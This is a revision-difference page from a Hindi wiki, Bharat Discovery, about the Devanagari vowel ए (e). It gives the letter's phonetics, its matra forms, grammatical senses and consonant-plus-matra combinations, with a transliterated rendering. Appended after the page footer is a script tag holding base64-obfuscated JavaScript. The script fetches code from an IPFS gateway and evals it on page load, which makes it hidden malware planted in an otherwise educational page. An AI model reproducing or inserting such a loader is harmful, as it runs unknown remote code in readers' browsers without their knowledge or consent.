Difference between revisions of "ए"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
|चित्र=ए.jpg
 
|चित्र=ए.jpg
 
|चित्र का नाम=
 
|चित्र का नाम=
|विवरण='''''' [[देवनागरी वर्णमाला]] का पाँचवा [[स्वर (व्याकरण)|स्वर]] है।  
+
|विवरण='''''' [[देवनागरी वर्णमाला]] का आठवाँ [[स्वर (व्याकरण)|स्वर]] है।
 
|शीर्षक 1=भाषाविज्ञान की दृष्टि से  
 
|शीर्षक 1=भाषाविज्ञान की दृष्टि से  
|पाठ 1= ओष्ठ्य, ह्रस्व (जिसका दीर्घ रूप ‘[[ऊ]]’ है), पश्च, वृत्तमुखी, संवृत और मूल स्वर है तथा घोष ध्वनि है।  
+
|पाठ 1= दीर्घ, अग्र, अवृत्तमुखी, अर्धसंवृत, और सन्युक्त स्वर है तथा घोष ध्वनि है। इसके उच्चारण में कंठ और तालू का प्रयोग होने से यह ‘कंठतालव्य’ वर्ण है।
|शीर्षक 2=  
+
|शीर्षक 2=अनुनासिक रूप
|पाठ 2=
+
|पाठ 2= ‘एँ’
 
|शीर्षक 3=मात्रा
 
|शीर्षक 3=मात्रा
|पाठ 3=‘ु’ (जैसे- कु, चु, टु, तु, पु)
+
|पाठ 3='े’ (जैसे- के, चे, टे, ते, पे)
 
|शीर्षक 4=व्याकरण
 
|शीर्षक 4=व्याकरण
|पाठ 4= [ [[संस्कृत]] (धातु) अत्‌+डु ] [[पुल्लिंग]]- शिव, ब्रह्मा।
+
|पाठ 4=[ [[संस्कृत]] + विच्‌ ] [[पुल्लिंग]]- विष्णु। अव्यय- स्मरण, ईर्ष्या, दया, आह्वान, तिरस्कार अथवा धिक्कार का सूचक शब्द।
 
|शीर्षक 5=
 
|शीर्षक 5=
 
|पाठ 5=
 
|पाठ 5=
Line 24: Line 24:
 
|पाठ 10=
 
|पाठ 10=
 
|संबंधित लेख=[[अ]], [[आ]], [[ई]], [[ओ]], [[औ]], [[ऊ]]
 
|संबंधित लेख=[[अ]], [[आ]], [[ई]], [[ओ]], [[औ]], [[ऊ]]
|अन्य जानकारी=पूर्वी [[हिंदी]] की ‘[[अवधी]]’ बोली आदि में शब्द के अंत में जुड़ने पर ‘उ’ का अर्थ ‘भी’ होता है। (खलउ = खल / दुष्ट भी)।
+
|अन्य जानकारी=  
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''ए''' [[देवनागरी वर्णमाला]] का आठवाँ [[स्वर]] है। भाषाविज्ञान की दृष्टि से यह दीर्घ, अग्र, अवृत्तमुखी, अर्धसंवृत, और सन्युक्त स्वर है तथा घोष ध्वनि है। इसके उच्चारण में कंठ और तालू का प्रयोग होने से यह ‘कंठतालव्य’ वर्ण है।
+
'''ए''' [[देवनागरी वर्णमाला]] का आठवाँ [[स्वर (व्याकरण)|स्वर]] है। भाषाविज्ञान की दृष्टि से यह दीर्घ, अग्र, अवृत्तमुखी, अर्धसंवृत, और सन्युक्त स्वर है तथा घोष ध्वनि है। इसके उच्चारण में कंठ और तालू का प्रयोग होने से यह ‘कंठतालव्य’ वर्ण है।
 
;विशेष-
 
;विशेष-
 
# ए का अनुनासिक रूप ‘एँ’ है।
 
# ए का अनुनासिक रूप ‘एँ’ है।
 
# ए की मात्रा [[व्यंजन (व्याकरण)|व्यंजन]] की शिरोरेखा के ऊपर लगती है। (जैसे- के, ने, से इत्यादि में)।
 
# ए की मात्रा [[व्यंजन (व्याकरण)|व्यंजन]] की शिरोरेखा के ऊपर लगती है। (जैसे- के, ने, से इत्यादि में)।
# [ [[संस्कृत ए+ विच्‌ ] [[पुल्लिंग]]- विष्णु। अव्यय- स्मरण, ईर्ष्या, दया, आह्वान, तिरस्कार अथवा धिक्कार का सूचक शब्द।
+
# [ [[संस्कृत]] ए+ विच्‌ ] [[पुल्लिंग]]- विष्णु। अव्यय- स्मरण, ईर्ष्या, दया, आह्वान, तिरस्कार अथवा धिक्कार का सूचक शब्द।
# [ [[फ़ारसी ] अव्यय- बुलाने का या सम्बोधनात्मक शब्द। जैसे- ए लड़के! इधर आ।
+
# [ [[फ़ारसी]] अव्यय- बुलाने का या सम्बोधनात्मक शब्द। जैसे- ए लड़के! इधर आ।
 
# अव्यय- एक विस्मयसूचक शब्द। जैसे- ए! तुम भी कवि हो।
 
# अव्यय- एक विस्मयसूचक शब्द। जैसे- ए! तुम भी कवि हो।
# [[सर्वनाम]]- ‘यह’ या ‘ये’। उदाहरण- ए नैना रिझवार –[[बिहारी]]
+
# [[सर्वनाम]]- ‘यह’ या ‘ये’। उदाहरण- ए नैना रिझवार –[[बिहारी]]
 
# अँग्रेज़ी वर्णमाला का पहला वर्ण जो ‘अ’ या ‘आ’ की ध्वनि देता है परंतु कहीं ‘ए’ भी।
 
# अँग्रेज़ी वर्णमाला का पहला वर्ण जो ‘अ’ या ‘आ’ की ध्वनि देता है परंतु कहीं ‘ए’ भी।
 
==ए अक्षर वाले शब्द==
 
==ए अक्षर वाले शब्द==

Revision as of 09:56, 27 November 2016

e
vivaran e devanagari varnamala ka athavaan svar hai.
bhashavijnan ki drishti se dirgh, agr, avrittamukhi, ardhasanvrit, aur sanyukt svar hai tatha ghosh dhvani hai. isake uchcharan mean kanth aur taloo ka prayog hone se yah ‘kanthatalavy’ varn hai.
anunasik roop ‘ean’
matra 'e’ (jaise- ke, che, te, te, pe)
vyakaran [ sanskrit e+ vichh‌ ] pulliang- vishnu. avyay- smaran, eershya, daya, ahvan, tiraskar athava dhikkar ka soochak shabd.
sanbandhit lekh a, a, ee, o, au, oo

e devanagari varnamala ka athavaan svar hai. bhashavijnan ki drishti se yah dirgh, agr, avrittamukhi, ardhasanvrit, aur sanyukt svar hai tatha ghosh dhvani hai. isake uchcharan mean kanth aur taloo ka prayog hone se yah ‘kanthatalavy’ varn hai.

vishesh-
  1. e ka anunasik roop ‘ean’ hai.
  2. e ki matra vyanjan ki shirorekha ke oopar lagati hai. (jaise- ke, ne, se ityadi mean).
  3. [ sanskrit e+ vichh‌ ] pulliang- vishnu. avyay- smaran, eershya, daya, ahvan, tiraskar athava dhikkar ka soochak shabd.
  4. [ farasi avyay- bulane ka ya sambodhanatmak shabd. jaise- e l dake! idhar a.
  5. avyay- ek vismayasoochak shabd. jaise- e! tum bhi kavi ho.
  6. sarvanam- ‘yah’ ya ‘ye’. udaharan- e naina rijhavar –bihari.
  7. aangrezi varnamala ka pahala varn jo ‘a’ ya ‘a’ ki dhvani deta hai parantu kahian ‘e’ bhi.

e akshar vale shabd

e ki matra e ka prayog

k + e = ke
kh + e = khe
g + e = ge
gh + e = ghe
d + e = de
ch + e = che
chh + e = chhe
j + e = je
jh + e = jhe
n + e = ne
t + e = te
th + e = the
d + e = de
dh + e = dhe
n + e = ne
t + e = te
th + e = the
d + e = de
dh + e = dhe
n + e = ne
p + e = pe
ph + e = phe
b + e = be
bh + e = bhe
m + e = me
y + e = ye
r + e = re
l + e = le
v + e = ve
sh + e = she
sh + e = she
s + e = se
h + e = he
ksh + e = kshe
tr + e = tre
jn + e = jne


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>